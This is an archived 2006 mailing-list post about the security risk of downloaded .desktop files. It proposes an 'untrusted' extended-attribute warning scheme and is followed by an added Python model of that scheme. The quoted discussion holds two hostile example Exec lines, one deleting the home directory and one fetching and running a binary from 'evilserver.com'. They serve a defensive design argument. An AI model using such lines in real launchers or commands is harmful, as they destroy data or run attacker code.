Security issue with .desktop files revisited
Francois Gouget
fgouget at codeweavers.com
Tue Mar 28 12:32:25 EEST 2006
Mike Hearn wrote:
> On Thu, 23 Mar 2006 17:55:26 +0100, Thiago Macieira wrote:
>
>>I don't see how it is any different from .desktop files with:
>>Exec=/bin/sh -c 'cd ; rm -rf *'
>>(don't run that!)
>
> It's not really, except you can write longer programs and even run
> arbitrary ELF programs too.
Not even. First KDE, at least, lets you specify multiple commands
separated by semi-colon so you could drop the 'sh -c':
Exec=/usr/X11R6/bin/xeyes;/usr/X11R6/bin/xeyes
But more importantly a small shell command is all you need to execute
arbitrary code:
Exec=sh -c 'wget -O /tmp/evil http://evilserver.com/evil;chmod u+x /tmp/evil;/tmp/evil'
Where 'evil' is any arbitrary executable. All that protects you is that
wget might possibly not be installed.
>>It looks like the best alternative.
>>
>>But why should we require users to go the properties and turn it
>>executable? If you've got a legitimate .desktop file, it already follows
>>the guidelines, which may include being executable or not.
I think the solution would be to do like Windows XP SP2 does (or maybe
it is Windows 2003). When you download a file (at least using IE and
depending on your 'zone' settings), it sets some 'extended file
attributes' to tag the file as untrusted. Then when you try to execute
that file, ShellExecute() (maybe CreateProcess() too) warns you that the
file may represent a security risk. If you decide to continue, then it
clears the extended file attribute so you don't get the warning again
and again. That attribute is also copied when you copy or rename the
file (at least I think so, if using the standard OS tools).
What this would mean for Linux:
* ext3 and other filesystems have support for extended attributes so
the basic support is there (though I'm not sure how widely used/stable
extended attributes support is).
* a standard would need to be defined so all involved applications use
the same extended attribute for this purpose
* applications that download stuff from the internet would need to set
that extended attribute. This means Konqueror, Firefox & co,
Thunderbird, Evolution, but, ideally, also wget, etc.
* file managers and desktop shells should warn the user when he tries
to run a file with this 'untrusted' extended attribute.
So in the above scenario, when the user downloads the rogue '.desktop'
file to his desktop, that file will be tagged as 'untrusted'. Then,
clicking on it would warn the user before running it. .desktop files
shipped with the distribution would not have the 'untrusted' bit and
thus would not issue this warning. Also, this warning could be
selectively issued only for .desktop and 'executable' files, and not if
the file is merely a simple jpeg. But that could be configurable and a
'paranoid' setting would warn for all untrusted files (in case they are
designed to trigger buffer overflows).
Such a solution requires quite a bit of work and time to be implemented
but then I think any solution to this problem does.
--
Francois Gouget
fgouget at codeweavers.com
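To make the proposal in the message above concrete, here is an added example that is not code from the original post, from any xdg specification, or from any desktop project. It models the scheme in Python on Linux: a downloader marks a saved file with an extended attribute, a launcher warns before running a marked .desktop or executable file, clears the mark once the user consents, and rename/copy carry the mark along. The attribute name `user.example.untrusted`, the helper names, the `confirm` callback standing in for the warning dialog and the sample files are all assumptions of mine; the actual attribute name is exactly the standard the post says still needs to be defined.

```python
"""Added example (not from the original post): a minimal model of the
"untrusted download" extended-attribute scheme.

Assumptions (none of these names come from the post or any standard):
  * the marker attribute is user.example.untrusted (hypothetical name)
  * downloaders call mark_untrusted() after writing the file
  * launchers call check_before_run() and honour its answer
Requires Linux and a filesystem with user.* xattr support
(ext3/ext4, xfs, btrfs, overlayfs ...)."""
import os
import shutil
import stat
import tempfile

UNTRUSTED_XATTR = "user.example.untrusted"  # hypothetical attribute name


def mark_untrusted(path, origin=""):
    """What a downloader (browser, mail client, wget) would do after saving.
    The value is informational; only the presence of the attribute matters."""
    os.setxattr(path, UNTRUSTED_XATTR, origin.encode() or b"1")


def is_untrusted(path):
    return UNTRUSTED_XATTR in os.listxattr(path)


def clear_untrusted(path):
    os.removexattr(path, UNTRUSTED_XATTR)


def is_risky(path, paranoid=False):
    """Default policy from the post: warn only for .desktop files and
    executables; the 'paranoid' setting warns for every untrusted file."""
    if paranoid:
        return True
    mode = os.stat(path).st_mode
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    return path.endswith(".desktop") or executable


def check_before_run(path, confirm, paranoid=False):
    """Launcher-side check. `confirm(path)` stands in for the warning dialog
    and returns True if the user chooses to continue. Returns True if the
    file may be run; on consent the mark is cleared so the user is not
    warned again and again."""
    if not is_untrusted(path) or not is_risky(path, paranoid):
        return True
    if not confirm(path):
        return False
    clear_untrusted(path)
    return True


def demo():
    """Walk through the scenario from the post with constructed files."""
    d = tempfile.mkdtemp(prefix="xattr-demo-")
    results, asked = {}, []
    refuse = lambda p: (asked.append(p), False)[1]
    accept = lambda p: (asked.append(p), True)[1]
    try:
        desktop = os.path.join(d, "evil.desktop")
        with open(desktop, "w") as f:  # constructed sample .desktop file
            f.write("[Desktop Entry]\nType=Application\nName=Evil\n"
                    "Exec=sh -c 'echo would run here'\n")
        mark_untrusted(desktop, "http://evilserver.com/evil.desktop")
        results["marked"] = is_untrusted(desktop)

        # user declines: nothing runs and the mark stays
        results["declined_blocks"] = check_before_run(desktop, refuse) is False
        results["declined_keeps_mark"] = is_untrusted(desktop)

        # rename keeps the inode; copy2 copies xattrs on Linux
        moved = os.path.join(d, "renamed.desktop")
        os.rename(desktop, moved)
        copied = os.path.join(d, "copy.desktop")
        shutil.copy2(moved, copied)
        results["rename_keeps_mark"] = is_untrusted(moved)
        results["copy_keeps_mark"] = is_untrusted(copied)

        # user accepts once: allowed, mark cleared, no second prompt
        n = len(asked)
        results["accepted_runs"] = check_before_run(moved, accept)
        results["accepted_clears_mark"] = not is_untrusted(moved)
        results["second_run_silent"] = (check_before_run(moved, refuse)
                                        and len(asked) == n + 1)

        # a plain data file only warns in paranoid mode
        jpeg = os.path.join(d, "photo.jpg")
        with open(jpeg, "wb") as f:  # constructed: JPEG SOI marker only
            f.write(b"\xff\xd8\xff\xe0")
        mark_untrusted(jpeg)
        n = len(asked)
        results["jpeg_default_silent"] = (check_before_run(jpeg, refuse)
                                          and len(asked) == n)
        results["jpeg_paranoid_warns"] = (
            check_before_run(jpeg, refuse, paranoid=True) is False)
    finally:
        shutil.rmtree(d)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The launcher check keys off the file's origin mark, not its contents, which is the point of the proposal: since any `Exec=` line can run arbitrary code, inspecting the .desktop file itself cannot tell a downloaded one from a distribution-shipped one, but the attribute can.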